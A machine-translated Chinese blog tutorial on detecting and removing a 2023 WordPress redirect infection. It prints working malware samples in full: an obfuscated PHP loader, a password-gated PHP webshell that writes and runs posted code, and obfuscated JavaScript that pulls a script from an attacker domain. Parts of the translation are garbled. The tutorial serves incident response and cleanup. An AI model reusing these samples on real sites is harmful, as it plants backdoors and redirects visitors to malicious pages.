修复重定向WordPress Hack 2023(病毒重定向)

WordPress绝对是最常用的平台 CMS (Content Management System) 对于博客和在线入门商店(带有WooCommerce模块),这使其成为计算机攻击(黑客)最大的目标。最常用的黑客操作之一旨在将折衷的网站重定向到其他网页。 Redirect WordPress Hack 2023年是一种相对较新的恶意软件,会影响整个网站重定向到垃圾邮件页面,或者又可以病毒用户计算机。

如果您在WordPress上开发的网站是在另一个站点上重定向的,那么受害者已经是著名的重定向黑客。

在本教程中,您将找到必要的信息和有用的提示,您可以通过这些信息来解散感染重定向的网站 WordPress Hack (Virus Redirect)。通过评论,您可以获取其他信息或寻求帮助。

检测重定向WordPress站点的病毒

站点上的流量突然和不合理的减少,减少订单数量(在线商店)或广告收据是第一个不正确的迹象。检测 “Redirect WordPress Hack 2023” (重定向病毒)可以做到,并且 “视觉的” 打开网站时,您将重定向到另一个网页。

从经验来看,大多数网络恶意软件应用程序都与Internet浏览器兼容: Chrome, Firefox, Edge, Opera。如果您是MAC计算机用户,则这些病毒在Safari浏览器中并不可见。 Safari安全系统默认地阻止了这些恶意脚本。

如果您有WordPress Hack Word Hack病毒网站,您需要做什么

我希望第一个措施不是惊慌或删除网站。甚至不应在第一阶段删除病毒或病毒文件。它们包含有价值的信息,可以帮助您了解安全漏洞的位置以及病毒的影响。作案操作。

关闭公众网站。

您如何关闭访问者的病毒网站? 最简单的是使用DNS经理并删除其IP “一个” (域名)或定义不存在的IP。因此,该网站的访问者将受到此重定向的WordPress黑客攻击,可以将它们带入病毒或垃圾邮件网页上。

如果您使用 CloudFlare drept DNS manager, te autentifici în cont și ștergi înregistrările DNSA” 对于域名。因此,受病毒影响的区域将保留在没有IP的情况下,无法从Internet访问。

复制网站的IP并执行 “路线” 能够只访问您。从您的计算机。

您如何更改Windows计算机上网站的真实IP?

该方法通常用于通过编辑文件来阻止对某些网站的访问 “主持人”。

1。打开记事本或其他文本编辑器(带有管理员权限)并编辑文件 “hosts“。它位于:

C:\Windows\System32\drivers\etc\hosts

2。在文件中 “主持人” 添加 “路线” 到您网站的真实IP。 IP从DNS Manager中删除。

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3。保存文件并在浏览器中访问网站。

如果网站没有打开,并且您没有在文件中犯错 “主持人”,很可能是DNS缓存。

要删除Windows操作系统上的DNS缓存,请打开命令提示符,在哪里执行订单:

ipconfig /flushdns

您如何更改Mac / MacBook计算机上网站的真实IP?

对于Mac计算机用户,更改网站的真实IP要容易一些。

1。打开公用事业 Terminal

2。执行命令行(需要执行系统密码):

sudo nano /etc/hosts

3。对于Windows计算机,添加域的真实IP。

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4。保存更改。 Ctrl+X (y)

完成后 “路线”,您是唯一可以访问WordPress Hack Word Hack病毒网站的人。

完整的备份网站 – 文件和数据库

即使是病毒 “重定向WordPress黑客”,建议是对整个网站进行一般备份。文件和数据库。可能您可以将两个文件的本地副本保存在 public / public_html 以及数据库。

识别病毒和重定向WordPress Hack 2023的修改文件

主要目标文件的 WordPress 我是 index.php (根深蒂固), header.php,,,, index.phpfooter.php WordPress主题主题。手动检查这些文件并确定恶意代码或恶意软件脚本。

在2023年,一种类型的病毒 “重定向WordPress黑客” 普京 index.php 形式守则:

(我不建议您执行这些代码!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

解码,这个 脚本恶意软件 这实际上是WordPress网站的结果。不是脚本是恶意软件应用程序的基础,而是脚本可以重定向病毒网页。如果我们解码上面的脚本,我们将获得:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
修复重定向WordPress Hack 2023
修复重定向WordPress Hack 2023

为了指示包含此代码的服务器上的所有文件,请访问是一件好事 SSH 到服务器上运行Linux上的支票 - UP和管理文件。

有关的: 在Google搜索的帮助下,您如何找到是否有病毒博客。 (WordPress病毒)

以下是两个命令,这些命令肯定有助于识别最近修改的文件和包含特定代码(字符串)的文件。

您如何看到在过去24小时内或Linux上其他时间范围内修改的PHP文件?

命令 “find” 它非常易于使用,并允许个性化设置时间段,即进行搜索和文件类型的补丁。

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

在输出中,您将收到有关修改文件的日期和时间的信息,编写 /阅读 /执行许可(chmod)以及其组 /用户所属的。

如果您想几天前检查,请更改值 “-mtime -1” 或使用 “-mmin -360” 几分钟(6小时)。

您如何在php文件中寻找代码(字符串)Java?

命令行 “寻找” 通过它,您可以快速找到包含特定代码的所有PHP或Java文件如下:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

订单将搜索和显示文件 .php.js 包含 “uJjBRODYsU“。

在上面的两个订单的帮助下,您将很容易找到最近修改了哪些文件并包含恶意软件代码。

从修改的文件中删除恶意软件,而不会损害正确的代码。在我的情况下,将恶意软件代码放置在开口之前 <head>

在执行第一阶 “寻找” 很有可能在服务器上发现新文件,这些文件不是WordPress或放在那里。宣布WordPress黑客重定向病毒的文件。

在我研究的情况下,表单文件出现在服务器上 “wp-log-nOXdgD.php“。这些是文件 “一代” 它还包含重定向病毒使用的恶意软件代码。

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

类型文件的目的 “wp-log-*” 它是为了传播重定向的黑客病毒和服务器上托管的其他网站。是类型的恶意软件代码 “webshell” 由一个 基本部分 (其中定义了一些加密变量)和O 执行部分 攻击者试图在系统中加载和执行恶意软件代码。

如果有变量 POST 称为 ‘bh‘ 及其加密价值 MD5 等于 “8f1f964a4b4d8d1ac3f0386693d28d03“,然后脚本似乎写了加密的内容 base64 一个称为另一个变量 ‘b3‘ 在临时文件中,然后尝试包含此临时文件。

如果有变量 POSTGET 称为 ‘tick脚本将以价值响应 MD5 字符串 “885“。

要识别包含此代码的服务器上的所有文件,请选择一个常见的字符串,然后执行 “find” (类似于上述)。 删除所有包含此恶意软件代码的文件

安全漏洞由重定向WordPress Hack操作

这种重定向病毒很可能通过 WordPress管理用户剥削 或通过识别 弱势插件 允许添加具有管理员特权的用户。

对于大多数在WordPress平台上构建的网站都是可能的 编辑主题或插件的主题到管理接口(Dashboard)。因此,恶意人可以添加生成上面介绍的脚本的主题恶意软件的文件。

这样的恶意软件的一个例子是:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript 打开标签后立即在WordPress主题标题中识别 <head>

解密此JavaScript非常困难,但是很明显,另一个网址最有可能带来其他脚本来创建文件 “wp-log-*” 我在上面谈论的。

从所有文件中搜索并删除此代码 PHP 做作的。

据我弄清楚这个代码是 手动添加 由具有管理特权的新用户。

因此,为防止在仪表板中添加恶意软件,最好禁用仪表板中的WordPress /插件。

编辑文件 wp-config.php 并添加行:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

进行此更改后,WordPress用户无法编辑仪表板文件。

用管理员的角色检查用户

以下是您可以在WordPress平台中使用管理员搜索用户的SQL查询:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

此查询将返回表中的所有用户 wp_users 谁归因于管理员的角色。查询是为表完成的 wp_usermeta 在元中搜索 ‘wp_capabilities',其中包含有关用户角色的信息。

另一种方法是从: Dashboard → Users → All Users → Administrator。但是我正在练习用户,可以隐藏在仪表板面板中。因此,查看用户的最佳方法 “行政人员” WordPress是上面的SQL命令。

就我而言,我在数据库中标识了用户名称 “wp-import-user“。非常有启发性。

WP恶意软件不良用户
WP恶意软件不良用户

从这里,您可以看到创建WordPress用户的日期和时间。用户的用户也非常重要,因为他正在在服务器日志中查看。这样,您可以看到此用户的所有活动。

用管理员的角色删除用户 那你不知道,那 更改密码 给所有行政用户。编辑,作者,管理员。

将SQL用户的密码更改为数据库 a website-ului afectat.

采取这些步骤后,可以为所有用户重新启动该网站。

但是,请注意,我上面提出的是2023年与WordPress Hack重定向的网站的数千个吐痰之一。

如果您的网站已经是病毒,需要帮助或您有任何疑问,则评论框是打开的。

从2006年开始,我对技术充满热情,在StealthSetts.com上写作。我在操作系统方面拥有丰富的经验:MacOS,Windows和Linux,以及编程语言和博客平台(WordPress)和在线商店(WooCommerce,Magento,Magento,Presashop)。

Home 您的教程,有用的提示和新闻。 修复重定向WordPress Hack 2023(病毒重定向)
留下你的评论